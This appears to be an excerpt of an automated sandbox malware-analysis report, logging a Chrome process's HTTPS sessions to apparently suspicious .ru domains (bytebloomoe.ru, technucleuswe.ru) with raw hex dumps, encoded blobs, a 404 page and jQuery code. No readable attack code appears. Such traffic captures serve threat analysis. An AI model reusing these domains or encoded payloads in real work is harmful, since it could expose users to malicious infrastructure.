                            2024-08-13 19:58:04 UTC1369INData Raw: 69 32 4e 6f 39 32 31 36 68 6d 51 42 78 49 47 5c 2f 47 4f 37 2b 34 45 5c 2f 70 4e 44 55 72 71 34 39 59 36 57 42 68 61 55 4a 56 79 77 42 5a 31 72 63 42 68 4c 6a 62 32 72 6e 65 58 5a 6e 6b 64 4b 73 76 63 4b 6d 4a 69 5a 4e 6e 32 4d 67 72 55 70 39 7a 43 74 44 79 7a 51 66 6f 66 39 4f 51 78 73 65 6f 58 52 41 71 4d 69 6b 6f 5a 79 54 64 64 5a 4d 49 70 38 67 62 2b 52 54 73 43 55 39 7a 32 53 41 65 6e 51 4e 70 41 57 71 46 6d 73 68 58 64 50 7a 61 6e 35 79 62 74 4f 69 30 76 59 6b 58 72 68 72 51 78 4c 41 73 55 6f 41 44 4a 39 31 42 72 53 2b 47 79 43 6b 64 73 70 38 51 68 66 36 75 4e 6a 51 6a 48 64 4f 43 49 73 71 50 55 78 74 4c 7a 49 51 75 48 4d 5a 41 73 67 61 31 76 52 33 4e 6d 6c 7a 49 58 4a 52 4f 48 6c 72 4d 61 6e 79 76 76 38 74 58 75 76 37 4e 2b 55 6b 69 35 37 34 41 6a
                            Data Ascii: i2No9216hmQBxIG\/GO7+4E\/pNDUrq49Y6WBhaUJVywBZ1rcBhLjb2rneXZnkdKsvcKmJiZNn2MgrUp9zCtDyzQfof9OQxseoXRAqMikoZyTddZMIp8gb+RTsCU9z2SAenQNpAWqFmshXdPzan5ybtOi0vYkXrhrQxLAsUoADJ91BrS+GyCkdsp8Qhf6uNjQjHdOCIsqPUxtLzIQuHMZAsga1vR3NmlzIXJROHlrManyvv8tXuv7N+Uki574Aj
                            2024-08-13 19:58:04 UTC1369INData Raw: 44 73 4a 69 76 55 6a 63 45 35 4a 58 64 43 54 41 70 71 55 51 64 31 49 61 35 62 62 33 42 37 72 78 66 70 43 35 63 4d 39 62 68 50 54 33 69 69 61 65 54 46 62 75 57 67 57 35 50 2b 50 6d 6d 33 4b 4c 53 77 39 30 47 43 34 6e 62 52 51 45 55 57 7a 53 51 76 57 58 71 71 6b 6c 50 4e 65 4a 47 74 33 5c 2f 51 49 57 68 56 51 31 62 52 31 6a 78 76 4c 6f 65 44 49 72 74 6b 65 38 38 47 63 43 59 4b 65 39 6f 6e 41 73 6a 59 6e 35 54 4c 32 6a 46 43 74 64 65 71 65 48 57 48 76 6a 71 38 62 76 49 69 76 6d 4f 66 68 61 30 35 35 2b 6f 62 49 7a 56 49 5a 5c 2f 74 35 51 65 47 36 6b 5a 73 62 77 4b 56 48 65 6d 46 6e 56 4c 71 4c 6a 43 36 41 66 62 54 38 7a 78 69 36 6a 4c 76 47 65 51 69 39 65 4a 4b 43 70 30 6c 6e 76 75 56 42 30 52 36 64 6f 35 7a 58 50 4e 6a 2b 4d 76 4c 49 49 77 30 59 56 70 59 5c
                            Data Ascii: DsJivUjcE5JXdCTApqUQd1Ia5bb3B7rxfpC5cM9bhPT3iiaeTFbuWgW5P+Pmm3KLSw90GC4nbRQEUWzSQvWXqqklPNeJGt3\/QIWhVQ1bR1jxvLoeDIrtke88GcCYKe9onAsjYn5TL2jFCtdeqeHWHvjq8bvIivmOfha055+obIzVIZ\/t5QeG6kZsbwKVHemFnVLqLjC6AfbT8zxi6jLvGeQi9eJKCp0lnvuVB0R6do5zXPNj+MvLIIw0YVpY\
                            2024-08-13 19:58:04 UTC1369INData Raw: 33 46 45 39 6b 47 77 6c 6e 42 6f 74 53 64 5a 31 43 32 65 38 34 76 34 51 73 71 74 73 38 30 4f 44 63 46 47 77 5c 2f 36 45 4d 4b 77 35 73 4f 48 51 62 52 4d 6b 4e 36 61 4c 61 58 42 34 4f 4c 75 2b 34 38 41 72 32 46 49 73 4a 53 70 7a 54 78 53 58 46 6b 32 76 73 5a 47 37 61 73 70 62 57 6a 2b 53 43 55 36 67 6b 33 75 35 32 62 49 7a 41 59 4b 35 65 52 46 31 46 6c 38 34 63 2b 37 2b 50 42 79 79 63 7a 6a 38 58 62 58 51 45 61 75 78 32 6d 54 56 45 2b 56 43 7a 4d 43 73 2b 65 45 32 67 36 4b 61 4e 57 72 5c 2f 73 4f 63 57 4a 67 48 64 46 45 6b 58 39 4c 59 38 47 32 7a 48 41 6b 31 68 30 4c 4a 2b 46 48 6a 79 50 76 66 78 71 34 45 4a 76 74 5a 79 54 75 31 65 54 65 4f 53 41 69 78 4d 69 5a 53 41 31 49 42 5a 38 7a 38 56 79 64 64 7a 71 34 48 65 41 37 6d 56 64 6d 76 55 49 50 69 73 6f 6f
                            Data Ascii: 3FE9kGwlnBotSdZ1C2e84v4Qsqts80ODcFGw\/6EMKw5sOHQbRMkN6aLaXB4OLu+48Ar2FIsJSpzTxSXFk2vsZG7aspbWj+SCU6gk3u52bIzAYK5eRF1Fl84c+7+PByyczj8XbXQEaux2mTVE+VCzMCs+eE2g6KaNWr\/sOcWJgHdFEkX9LY8G2zHAk1h0LJ+FHjyPvfxq4EJvtZyTu1eTeOSAixMiZSA1IBZ8z8Vyddzq4HeA7mVdmvUIPisoo


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.659186104.21.81.2074432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:05 UTC632OUTGET /8QnWX/, HTTP/1.1
                            Host: bytebloomoe.ru
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://bytebloomoe.ru/8QnWX/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: PHPSESSID=kn523ugumdhe6h89qej7h3np25
                            2024-08-13 19:58:05 UTC654INHTTP/1.1 404 Not Found
                            Date: Tue, 13 Aug 2024 19:58:05 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, max-age=0
                            pragma: no-cache
                            vary: Accept-Encoding
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuCLcwhOH3BOSV4nEUqHvLvT7sEbfMdKfU7%2FSp6%2BDXheB4JDRANpTyuGrG3v93XXhgQIVATEgSL3nX6YKbfCI6y%2B4ItNsuych36cIF4KjZrnPIhFU9Xmams0MF3hDj08jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b4722e9c743d6-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:05 UTC715INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                            Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                            2024-08-13 19:58:05 UTC541INData Raw: 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64
                            Data Ascii: esource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid
                            2024-08-13 19:58:05 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.659192151.101.2.1374432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:05 UTC620OUTGET /jquery-3.6.0.min.js HTTP/1.1
                            Host: code.jquery.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:05 UTC611INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 89501
                            Server: nginx
                            Content-Type: application/javascript; charset=utf-8
                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                            ETag: "28feccc0-15d9d"
                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            Via: 1.1 varnish, 1.1 varnish
                            Accept-Ranges: bytes
                            Age: 1594642
                            Date: Tue, 13 Aug 2024 19:58:05 GMT
                            X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890090-NYC
                            X-Cache: HIT, HIT
                            X-Cache-Hits: 55, 0
                            X-Timer: S1723579086.768386,VS0,VE1
                            Vary: Accept-Encoding
                            2024-08-13 19:58:05 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                            2024-08-13 19:58:05 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                            2024-08-13 19:58:05 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                            2024-08-13 19:58:05 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                            2024-08-13 19:58:05 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                            2024-08-13 19:58:05 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                            2024-08-13 19:58:05 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                            2024-08-13 19:58:05 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                            2024-08-13 19:58:05 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                            2024-08-13 19:58:05 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.659193188.114.96.34432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:05 UTC341OUTGET // HTTP/1.1
                            Host: technucleuswe.ru
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:06 UTC653INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-powered-by: PHP/7.3.33
                            access-control-allow-origin: *
                            vary: Accept-Encoding
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEKkRjLAkNWWShi9PPP4kj1LuHb481OwVuYkPozefSfTaz764gG97czBAwjr36EWcB7itUkMWwAs5i%2FJof5appfnbybdrnSDSEoxDVeof5SFCiYkj%2FU3JMvmYkKD8yEYG%2FsU"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b4726c91572a4-EWR
                            alt-svc: h3=":443"; ma=86400
